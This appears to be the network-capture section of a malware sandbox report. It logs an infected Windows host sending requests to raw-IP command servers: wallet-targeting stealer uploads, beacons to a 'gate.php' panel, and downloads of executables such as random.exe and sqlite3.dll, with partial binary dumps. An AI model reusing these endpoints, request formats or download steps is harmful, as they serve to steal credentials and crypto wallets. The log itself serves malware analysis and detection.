Dec 12, 2024 16:49:09.021672964 CET	1236	IN	Data Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
Dec 12, 2024 16:49:09.021753073 CET	916	IN	Data Raw: 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d Data Ascii: bWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWp
Dec 12, 2024 16:49:09.099354982 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="message"fplugins------KKFHJDAEHIEHJJKFBGDA--
Dec 12, 2024 16:49:09.538762093 CET	335	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 12, 2024 16:49:09.603564024 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAE Host: 185.215.113.206 Content-Length: 6907 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:09.603564024 CET	6907	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 Data Ascii: ------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 12, 2024 16:49:10.669698000 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 12, 2024 16:49:11.637670994 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:12.076374054 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 12, 2024 16:49:12.076385975 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 12, 2024 16:49:12.080671072 CET	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	50030	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:07.121339083 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:07.246330023 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:08.555630922 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	50032	34.107.221.82	80	504	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:07.208214998 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:49:08.295306921 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75190 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:49:18.399981976 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 12, 2024 16:49:28.607425928 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	50034	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:08.786503077 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:08.908524990 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:10.348419905 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	50035	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:09.224946022 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014443001&unit=246122658369
Dec 12, 2024 16:49:10.575232029 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	50036	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:10.582787991 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:10.703398943 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:12.334602118 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	50037	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:10.806689978 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:49:12.109173059 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:11 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 12, 2024 16:49:12.109188080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:12.109198093 CET	1236	IN	Data Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00 Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
Dec 12, 2024 16:49:12.109327078 CET	1236	IN	Data Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6 Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
Dec 12, 2024 16:49:12.109333992 CET	896	IN	Data Raw: 45 d4 89 c3 83 e3 fc 83 e0 03 31 ff 83 f8 01 74 1e 83 f8 02 74 0e 83 f8 03 75 23 90 0f be 7c 1a 02 c1 e7 10 90 0f be 44 1a 01 c1 e0 08 31 c7 90 0f be 04 1a 31 f8 69 c0 95 e9 d1 5b 31 c6 8b 45 d8 83 f8 10 72 43 8d 50 01 81 fa 00 10 00 00 72 2a 90 Data Ascii: E1ttu#\|D11i[1ErCPr*MA) U$ffff.ERP1i[1TWMAEEAEEuuVHAuVH
Dec 12, 2024 16:49:12.109338999 CET	1236	IN	Data Raw: 68 d0 20 40 00 6a 00 6a 00 e8 cc 51 00 00 83 c4 18 90 8b 4d e0 89 01 85 c0 0f 84 fd 00 00 00 90 c7 45 d8 00 00 00 00 90 8b 45 d4 8b 30 85 f6 0f 84 fb 00 00 00 e8 65 10 00 00 39 c6 0f 84 fd 00 00 00 90 6a 00 8b 75 e0 ff 76 04 ff 36 e8 fe 0f 00 00 Data Ascii: h @jjQMEE0e9juv6FuAEj@@EMEQjPh"@jj-QEEu9juue
Dec 12, 2024 16:49:12.109344006 CET	1236	IN	Data Raw: e8 dc 00 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc b8 28 d4 41 00 e9 9d 1f 00 00 cc cc cc cc cc cc b8 a8 d4 41 00 e9 8d 1f 00 00 cc cc cc cc cc cc b8 08 d5 41 00 e9 7d 1f 00 00 cc cc cc cc cc cc b8 64 d5 41 00 e9 6d 1f 00 00 cc Data Ascii: ](AAA}dAmA]tAMA=A-<AhAUugQYtuaYt]}gaUuY]
Dec 12, 2024 16:49:12.109354019 CET	1236	IN	Data Raw: 0c 56 e8 0b fc ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 14 56 8b 75 08 ff 34 b5 7c 61 41 00 e8 1f 00 00 00 50 ff 34 b5 98 61 41 00 8d 4d ec e8 02 02 00 00 68 2c d7 41 00 8d 45 ec 50 e8 8d 17 00 00 cc b8 44 e6 41 00 c3 55 8b ec 8b 45 08 8b Data Ascii: VYY^]UVu4\|aAP4aAMh,AEPDAUEUH]UQQVWuupEPAPTYY_^UAVuV;Bu;Eu2^]UQVWy1urAE_^UUVuBN@;Au
Dec 12, 2024 16:49:12.109548092 CET	1236	IN	Data Raw: 75 02 5d c3 50 3d 00 10 00 00 72 07 e8 0a 00 00 00 eb 05 e8 f1 f6 ff ff 59 5d c3 55 8b ec 8b 45 08 8d 48 23 3b c8 0f 86 1f f8 ff ff 51 e8 d7 f6 ff ff 59 8b c8 85 c9 74 0b 8d 41 23 83 e0 e0 89 48 fc 5d c3 e9 9c 53 00 00 83 61 04 00 8b c1 83 61 08 Data Ascii: u]P=rY]UEH#;QYtA#H]SaaAALaAUMu*h AEP}UVu1aA^]UQVuubA^UVubA^]UjhL\AdPQSVWA3P
Dec 12, 2024 16:49:12.109553099 CET	896	IN	Data Raw: 28 39 03 0f 84 80 00 00 00 8d 46 08 50 ff 15 44 cc 41 00 eb 74 83 7f 04 00 8b 0f 7c 57 7f 04 85 c9 72 51 0b 4f 04 75 05 39 4f 08 7e 47 8d 45 ec 50 e8 dd 00 00 00 8b 07 59 8b 4d f0 3b 4f 04 7c 19 7f 05 39 45 ec 72 12 39 45 ec 75 59 3b 4f 04 75 54 Data Ascii: (9FPDAt\|WrQOu9O~GEPYM;O\|9Er9EuY;OuTE;G}LE^(9t%FPdAu^(9tFPdAtN,AF,~+u(N,tGuGjjXE3_[M3^UEPpA3]UQQE
Dec 12, 2024 16:49:12.229001045 CET	1236	IN	Data Raw: 33 c0 c3 e8 48 05 00 00 e8 7c 04 00 00 50 e8 93 4f 00 00 59 c3 6a 14 68 80 d8 41 00 e8 0a 07 00 00 6a 01 e8 9f 02 00 00 59 84 c0 0f 84 50 01 00 00 32 db 88 5d e7 83 65 fc 00 e8 39 02 00 00 88 45 dc a1 24 f5 41 00 33 c9 41 3b c1 0f 84 2f 01 00 00 Data Ascii: 3H\|POYjhAjYP2]e9E$A3A;/uI$AhLAh,AJYYtEh(Ah AJYY$A]uYC39>tV$Yt6WjWA!9>tVYt6O<Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	50038	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:12.567730904 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:12.687510967 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:14.010266066 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	50039	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:13.387056112 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:49:14.712424040 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:14 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 12, 2024 16:49:14.712445974 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:14.712455988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:14.712486982 CET	1236	IN	Data Raw: 44 00 00 90 69 04 be 95 e9 d1 5b 89 c1 c1 e9 18 31 c1 69 c1 95 e9 d1 5b 69 ca 95 e9 d1 5b 31 c1 69 44 be 04 95 e9 d1 5b 89 c2 c1 ea 18 31 c2 69 c2 95 e9 d1 5b 69 d1 95 e9 d1 5b 31 c2 83 c7 02 39 fb 75 bf f6 45 e0 04 74 1d 90 69 3c be 95 e9 d1 5b Data Ascii: Di[1i[i[1iD[1i[i[19uEti<[1i[i[1E1ttu#\|D11i[11i[1;uu$U}D$MJLEEEr2P
Dec 12, 2024 16:49:14.712492943 CET	1236	IN	Data Raw: 9f 41 00 e8 57 00 00 00 83 c4 08 90 8b 45 c4 8d 4d c4 6a 01 ff 10 90 c7 45 c4 44 60 41 00 8d 45 c8 50 e8 06 2f 00 00 83 c4 04 b8 07 16 40 00 83 c4 0c 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 0c 83 c5 0c 90 c7 45 c4 44 60 41 00 8d 45 c8 50 Data Ascii: AWEMjED`AEP/@]ff.UED`AEP.]SWV\|$A1D$\$$j93SjWVp0;L$1^_[UWVu}A1Ehmd5XAEUj
Dec 12, 2024 16:49:14.712498903 CET	1236	IN	Data Raw: 00 eb 13 90 ff 75 e0 e8 88 08 00 00 83 c4 04 56 ff 15 48 cc 41 00 90 8b 45 e8 64 a3 00 00 00 00 b0 01 83 c4 4c 5e 5f 5b 5d c3 90 c7 45 f0 03 00 00 00 e8 64 05 00 00 e8 c5 64 00 00 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 1c 83 c5 0c Data Ascii: uVHAEdL^_[]Eddffffff.Uu9]Uu]U]@U]@UMa]fff.U]@U]D$t
Dec 12, 2024 16:49:14.712503910 CET	1236	IN	Data Raw: 7d dc 00 75 05 83 c4 18 5d c3 e8 93 65 00 00 cc cc cc cc cc cc cc cc b8 60 f0 41 00 c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 83 ec 14 89 4d e8 90 89 65 ec c7 45 f8 ff ff ff ff 8d 45 f0 c7 45 f4 10 23 40 00 64 8b 0d 00 00 00 00 89 4d f0 64 a3 Data Ascii: }u]e`AUVMeEEE#@dMdED`AP%}utVEd^]@UPE}tP]IAEhAUSWVUeEEE
